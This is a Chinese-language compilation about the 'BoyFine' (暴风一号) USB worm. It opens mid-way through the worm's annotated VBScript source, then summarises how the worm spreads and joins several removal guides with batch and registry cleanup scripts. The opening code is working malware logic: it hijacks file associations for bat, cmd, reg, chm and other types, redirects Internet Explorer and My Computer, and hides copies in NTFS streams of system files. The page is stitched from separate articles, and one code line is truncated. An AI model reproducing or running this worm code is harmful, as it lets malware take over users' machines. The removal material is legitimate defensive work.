WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command\", Value, "REG_EXPAND_SZ")End SubSub SetInfFileAss(sFilePath)'改变inf格式⽂件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command\", Value, "REG_EXPAND_SZ")End SubSub SetBatFileAss(sFilePath)'改变bat格式⽂件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command\", Value, "REG_EXPAND_SZ")End SubSub SetCmdFileAss(sFilePath)'改变cmd格式⽂件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\", Value, "REG_EXPAND_SZ")End SubSub SethlpFileAss(sFilePath)'改变hlp格式⽂件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")End SubSub SetRegFileAss(sFilePath)'改变reg格式⽂件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")End SubSub SetchmFileAss(sFilePath)'改变chm格式⽂件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")End SubSub SetIEAss(sFilePath)'篡改IE启动设置On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" OIE "Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command\", Value, "REG_EXPAND_SZ")Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\", Value,"REG_EXPAND_SZ")End SubSub SetMyComputerAss(sFilePath)'改变我的电脑的打开关联,包括Win+EOn Error Resume NextDim Value1,Value2Value1="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" OMC "Value2="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" EMC "Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\", "", "REG_SZ")Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\", Value1, "REG_EXPAND_SZ") Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\", Value2,"REG_EXPAND_SZ")End SubFunction GetSerialNumber(Drv)'获取驱动器序列号的绝对值On Error Resume NextSet d=fso.GetDrive(Drv)GetSerialNumber=d.SerialNumber'返回⼗进制序列号,⽤于唯⼀标识⼀个磁盘卷GetSerialNumber=Replace(GetSerialNumber,"-","")'去掉负号End FunctionFunction GetMainVirus(N)'根据N的值获取不同的字符串On Error Resume NextMainVirusName=GetSerialNumber(GetSystemDrive())&".vbs"'以驱动器的序列号绝对值为vbs病毒的名字If GetFileSystemType(GetSystemDrive())="NTFS" Then'系统盘是NTFS分区If N=1 ThenGetMainVirus=Fso.GetSpecialFolder(N)&"\smss.exe:"&MainVirusName'返回"c:\windows\system32\smss.exe:72161642.vbs"End IfIf N=0 ThenGetMainVirus=Fso.GetSpecialFolder(N)&"\explorer.exe:"&MainVirusName'返回"c:\windows\explorer.exe:72161642.vbs"End IfElse'系统盘是FAT32分区GetMainVirus=Fso.GetSpecialFolder(N)&"\"&MainVirusName'返回"c:\windows\72161642.vbs"或者"c:\windows\system32\72161642.vbs"End IfEnd FunctionFunction VBSProcessCount(VBSPath)'返回指定路径vbs脚本的运⾏个数On Error Resume NextDim WMIService, ProcessList, ProcessVBSProcessCount=0Set WMIService=GetObject("winmgmts:\\.\root\cimv2")Set ProcessList=WMIService.ExecQuery("Select * from Win32_Process Where "&"Name='cscript.exe' or Name='wscript.exe' or Name='svchost.exe'") For Each Process in ProcessListIf InStr(mandLine, VBSPath)>0 ThenVBSProcessCount=VBSProcessCount+1End IfNextEnd FunctionFunction PreDblInstance()'⽤来计数wscript进程的个数,如果⼤于等于3个那么返回TrueOn Error Resume NextPreDblInstance=FalseIf VBSProcessCount(WScript.ScriptFullName)>= 3 ThenPreDblInstance=TrueEnd IfEnd FunctionFunction GetTargetPath(LnkPath)'获取快捷⽅式的vbs脚本地址On Error Resume NextDim ShortcutSet Shortcut=WshShell.CreateShortcut(LnkPath)GetTargetPath=Shortcut.TargetPathEnd FunctionFunction GetCode(FullPath)'获取⽂件的所有代码On Error Resume NextDim FileTextSet FileText=FSO.OpenTextFile(FullPath, 1)GetCode=FileText.ReadAllFileText.CloseEnd FunctionFunction GetVersion()'获取windows版本Dim VerInfoVerInfo="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"If ReadReg(VerInfo)="" ThenGetVersion=0ElseGetVersion=CInt(ReadReg(VerInfo))End IfEnd FunctionSub VirusAlert()'创建⼀个BFAlert.hta,然后打开该⽹页,⿊⿊的,什么都没有,吓⼈的On Error Resume NextDim HtaPath,HtaCodeHtaPath=Fso.GetSpecialFolder(1)&"\BFAlert.hta"HtaCode="<HTML><HEAD><TITLE>暴风⼀号</TITLE>"&VBCRLF&"<HTA:APPLICATION APPLICATIONNAME=""BoyFine V1.0"" SCROLL=""no"" windowstate=""maximize"" border=""none"""&VBCRLF&"SINGLEINSTANCE=""yes"" CAPTION=""no"" contextMenu=""no"" ShowInTaskBar=""no"" selection=""no"">"&VBCRLF&"</HEAD><BODY bgcolor=#000000><DIV align =""center"">"&VBCRLF&"<font style=""font-size:3500%;font-family:Wingdings;color=red"">N</font><BR>"&VBCRLF&"<font style=""font-size:200%;font-family:⿊体;color=red"">暴风⼀号</font>"&VBCRLF&"</DIV> </BODY></HTML>"If FSO.FileExists(HtaPath)=False ThenCall CreateFile(HtaCode, HtaPath)Call SetHiddenAttr(HtaPath)End IfCall Run(HtaPath)End SubFunction GetInfectedDate()'获取感染⽇期On Error Resume NextDim DateInfoDateInfo="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"If ReadReg(DateInfo)="" ThenGetInfectedDate=""ElseGetInfectedDate=CDate(ReadReg(DateInfo))End IfEnd FunctionSub MakeJoke(Times)'恶搞,弹出光驱On Error Resume NextDim WMP, colCDROMsSet WMP = CreateObject( "WMPlayer.OCX" )Set colCDROMs = WMP.cdromCollectionIf colCDROMs.Count >0 ThenFor i=1 to TimescolCDROMs.Item(0).eject()WScript.Sleep 3000colCDROMs.Item(0).eject()NextEnd IfSet WMP = NothingEnd Sub病毒的运⾏思路:添加启动项,隐藏各个盘符下的⽬录,创建指向的快捷⽅式,破坏隐藏选项,破坏⽂件关联,破坏我的电脑打开⽅式,开启⾃动播放,创建autorun.inf。
u盘快捷键病毒处理
中了暴风一号病毒,暴风一号病毒目前杀毒软件仅能杀除他的母体,但是那些1KB文件夹快捷方式无妨清理,而且如果不修复被修改的注册表项的话,重启后进入我的电脑将出现找不到vbs的提示。
这个病毒具有感染NTFS数据流的功能,要彻底处理。
可能你的杀毒软件并没有杀干净!
可以用金山U盘专杀和金山网盾这两个软件,百度一下就找到了。
先运行金山网盾,点击一键修复,处理掉病毒和系统错误。
然后再运行金山U盘专杀这个工具,勾选全盘扫描,他能处理掉病毒母体和那些产生的快捷方式(如有残留请自己删掉,一般没残留)
你只要在菜单栏“工具-文件夹选项-查看-高级设置(隐藏文件或文件夹)选中显示所有文件”确定,你就会看到你真实的文件,凡是快捷方式的千万别点击,这样会激活病毒。
这时你下载一个最新版的360杀毒软件,把全盘杀毒,注意在杀毒时,不要操作别的以免引起病毒传染。
如果不行。
那最绝的方法就是重装系统后,安装杀毒软件,全盘杀毒,一定要彻底,后在把u盘插上杀毒。
可搞定。
怎么清除1kb病毒中毒现象:磁盘根目录文件夹会变成快捷方式,打开会显示脚本错误等。
方法:1、全盘格式化,再重装系统。
(这个方法最直接,不过会丢失所有数据。
)2、使用“1KB文件夹快捷方式病毒清除专用”工具。
(这种方法最好,强烈推荐,简单快捷)首先使用“自动化清除脚本程序”清除系统内此病毒。
如果“自动化清除脚本程序”清除无效。
请使用“清理工具”清理系统,并重启电脑即可。
然后用“恢复文件夹属性工具”恢复被隐藏的各盘文件夹。
3、手动杀毒:(这种方法好玩,喜欢弄电脑的不如去试下) ,进PE,删除C:\盘至Z:\盘的根目录下的Autorun.inf文件删除C:\盘至Z:\盘的根目录下的*.vbs文件删除C:\盘至Z:\盘的根目录下的*.lnk文件,然后重装系统,用记事本编辑以下数据,后缀改成bat@echo off>nulsetlocal enabledelayedexpansion>nultitle 修改系统属性和隐藏属性>nulcolor f0mode con: cols=41 lines=25>nul cls>nulECHO ================================ECHO 请选择要进行的操作,然后按回车ECHO ————————————————echo 加系统和隐藏属性 (1)echo.echo 减系统和隐藏属性 (2)echo.echo 退出 (3)echo.set /p UserSelection=选择 ( 1 , 2 )set b=%~1>nulif "!b:~1!"=="\" set b=!b:~0,-1!>nul if "%UserSelection%"=="1" ( attrib -s -h "!b!">nulattrib +s +h "!b!">nulattrib /s /d -s -h "!b!\*">nul attrib /s /d +s +h "!b!\*">nul ) if "%UserSelection%"=="2" ( attrib -s -h "!b!" >nulattrib /s /d -s -h "!b!\*">nul )pause>nulexit把那些隐藏的文件拖入该文件中可恢复其系统隐藏属性.。
关于“1kb快捷方式病毒”的处理办法去了西超打印店一趟,发现U盘上的文件全部变成了快捷方式,只有1kb,当时并没有注意,因为文件还是能正常打开的。
但是后来发现存进U盘的文件全部变成了快捷方式,这才觉得不对劲,百度了一下,发现这是种蠕虫病毒:Worm.Script.VBS.Autorun.be,又叫暴风一号(boyfine)最早可能出现在2010年年初,通过U盘进行传播,在3个月内就至少感染了5万台电脑。
现在···他来到了西农,走到了我们身边。
一旦他进入你的电脑,就马上会忙碌起来,做一下几件事情:1、自变形2、自复制病毒会遍历各个磁盘,并向其根目录写入Autorun.inf 以及.vbs文件,当用户双击打开磁盘时,会触发病毒文件,使之运行。
病毒会将系统的 Wscript.exe 复制到C:\Windows\System\svchost.exe如果是FAT 格式,病毒会将自身复制到C:\Windows\System32 下,文件名为随机数字。
如果是NTFS 格式,病毒将会通过NTFS 文件流的方式,将其附加到如下文件中。
C:\Windows\explorer.exeC:\Windows\System32\smss.exe3、改注册表病毒会修改注册表键值,将其键值指向病毒文件。
当用户运行inf,bat,cmd,reg,chm,hlp类型的文件,打开Internet Explorer ,或者双击我的电脑图标时,会触发病毒文件,使之运行。
4、遍历文件夹病毒会递归遍历各个盘的文件夹,当遍历到文件夹之后,会将文件夹设置为“隐藏+ 系统+ 只读”的属性。
同时创建一个快捷方式,其目标指向vbs脚本,参数指向被病毒隐藏的文件夹。
5.····所以!!当你的文件全部变成快捷方式以后,千万不要双击那个文件!千万不要!千万不要!尽管文件还是能打开的。
对了!能打开,说明文件并没有丢失,他只是被病毒给隐藏起来了,设置一下,还是能看见的。
U盘病毒杀不掉怎么办
U盘病毒杀不掉怎么办
你是否遇到过杀不掉的U盘病毒呢?很多时候我们都会遇到这种情况,U盘双击无法打开,用杀毒软件也无法查到病毒,但是却能看到autorun.inf文件,可是杀掉之后再次打开U盘又会出现。
这究竟是怎么一回事呢?
其实原因是这样的,碰到这种情况并不是U盘病毒杀不掉,而是你的电脑中病毒了,当你重新双击点开U盘时候,病毒又再次自动进入U盘,因此才会出现这种永远杀不掉的病毒。
解决方法如下:
1、取消自动播放,这点非常重要。
2、将杀毒软件升级到最新,这种情况一般是电脑里有病毒,必须保证电脑是干净的。
3、当你电脑是干净的情况下,再下载U盘病毒查杀工具,就可以解决杀不掉的U盘病毒。
若U盘没重要资料可以格式化!
我们需要理解的是,U盘中没有杀不掉的.病毒,只有是电脑的问题,有进程或隐藏进程在监视U盘,当U盘插入时,进程会向U盘里面写入autorun.inf这个文件。
因此碰到这样的问题最重要的就是保持电脑干净再对U盘做处理。
U盘病毒-.vbs-wscript.exe
机子又中毒了,这次中的是U盘病毒。
前几天在九六设计室拷文件的时候发现他们那边机子上的word文档不能正常打开,当时也没怎么在意,等把东西拷到我的电脑里面的时候才发现大事不妙,终于不得不承认我又中标了。
先说说症状:
1.卡巴斯基不断的报警,有四五个病毒不断的复制,始终杀不完。
在每个盘里新建一个antorun.inf文件夹才得以解决。
2.360杀毒软件没运行多长时间自动关闭。
3.病毒名中有vbs,杀完毒后删除的文件是administrator.vbs
4.启动项里有administrator.vbs
5.运行任务管理器,可以看到有wscript.exe进程,几秒钟后任务管理器自动关闭。
6.机子卡,像QQ这样的文件也会自动关闭。
做一下准备工作:
1.首先准备一个没有被感染的wscript.exe文件,为了恢复被病毒感染的程序(可以到其它机子上找,安装盘里也有,上网下载也可以).
2.将如下代码复制到一个新建文本文档里.并改名为hidden.reg,用处是:修改被病毒破坏的显示系统隐藏文件的注册表
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Expl orer\Advanced\Folder\Hidden]
'Text'='@shell32.dll,-30499'
'Type'='group'
'Bitmap'=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f ,00,6f,00,74,\
00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c, 00,53,00,\
48,00,45,00,4c,00,4c,00,33,00,32,00,2e,00,64,00,6c,00,6c,00,2c,00, 34,00,00,\
00
'HelpID'='shell.hlp#51131'
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Expl orer\Advanced\Folder\Hidden\NOHIDDEN]
'RegPath'='Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\ \Advanced'
'Text'='@shell32.dll,-30501'
'Type'='radio'
'CheckedValue'=dword:00000002
'ValueName'='Hidden'
'DefaultValue'=dword:00000002
'HKeyRoot'=dword:80000001
'HelpID'='shell.hlp#51104'
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Expl
orer\Advanced\Folder\Hidden\SHOWALL]
'RegPath'='Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\ \Advanced'
'Text'='@shell32.dll,-30500'
'Type'='radio'
'CheckedValue'=dword:00000001
'ValueName'='Hidden'
'DefaultValue'=dword:00000002
'HKeyRoot'=dword:80000001
'HelpID'='shell.hlp#51105'
当然也可以直接查找到注册表中的
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explo rer\Advanced\Folder\Hidden\SHOWALL中的CheckedValue值改为1
3.将下面代码保存到另外一个文本文档里,并改名为*.bat(如:vbs.bat). @echo off
@echo 在其它任务管理器查(如:超级兔子)看时有wscript.exe程序
@echo PS: 在windows任务管理器中无法找到此程序
pause
@echo 下一步会结束桌面,属于正常,等查杀结束将会恢复!
taskkill /im explorer.exe /f
taskkill /im wscript.exe /t /f
reg delete
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\r un /va /f
@echo 请耐心等待,可能过程有点长....
del c:\autorun.* /f /q /as
del %SYSTEMROOT%\system32\autorun.* /f /q /as
del c:\.vbs /f /q /s /as
del c:\.vbe /f /q /s /as
del c:\wscript.exe /f /q /s
del d:\autorun.* /f /q /s /as
del e:\autorun.* /f /q /s /as
del f:\autorun.* /f /q /s /as
del g:\autorun.* /f /q /s /as
del h:\autorun.* /f /q /s /as
del i:\autorun.* /f /q /s /as
del j:\autorun.* /f /q /s /as
del k:\autorun.* /f /q /s /as
del l:\autorun.* /f /q /s /as
@echo 请单击确定,以修复注册表!
call hidden.reg
copy wscript.exe %SYSTEMROOT%\system32\
start explorer.exe
@echo 病毒已经清理完毕:)
pause
批处理作用原理是:关闭explorer.exe程序(很多病毒喜欢加载到这个进程中)关闭病毒程序wscript.exe进程,删除其自启动项,删除病毒文件本体和被感染的wscript.exe文件删除各个硬盘自启动文件autorun.inf 修复系统隐藏注册表项重新拷贝一个未被感染的wscript.exe文件到system32文件夹中建立桌面程序退出
4.将做好的的hidden.reg和*.bat文件和wscript.exe文件放到同一个文件夹中.
注意事项:
注:在清除玩病毒前切不可以双击打开硬盘和u盘也不可以右键打开要用win 文件管理器或者在地址栏打开
1.开始运行后会出现桌面消失的现象,情况属于正常,等杀毒结束,会新建桌面.
2.删除自启动文件是可能有点慢,请耐心等候.
3.在删除wscript.exe文件是有可能有提示,说是删除系统文件要从安装盘中重新拷贝什么的,同意就可以了.后面会自动拷贝此文件
4.在修复注册表是会提示是否加入,点确定即可.
步骤:双*.bat文件运行然后按照提示一步步向下进行就可以了!
善后工作:
1.关闭硬盘的自动播放功能.这样可以阻挡大部分的通过u盘自动播放的传染的病毒.(如本病毒)
方法:开始-运行-输入'gpedit.msc'打开策略组-找到:'用户配置-系统模板-
系统'-单击系统在右侧找到'关闭自动播放'一项-右键单击点属性-选择'已使用'-下面的关闭自动播放选项选择所有硬盘-应用确定
2.如果u盘有毒的话.删除u盘的病毒
方法:将下列代码保存为u.bat文件然后双击,也可以在cmd里面逐行输入. 其中X为u盘盘符
del X:\.vbs /f /q /s /as
del X:\.vbe /f /q /s /as
del X:\autorun.* /f /q /s /as
3.建议重启
OKEY 要清除的病毒搞定了呵呵:)。
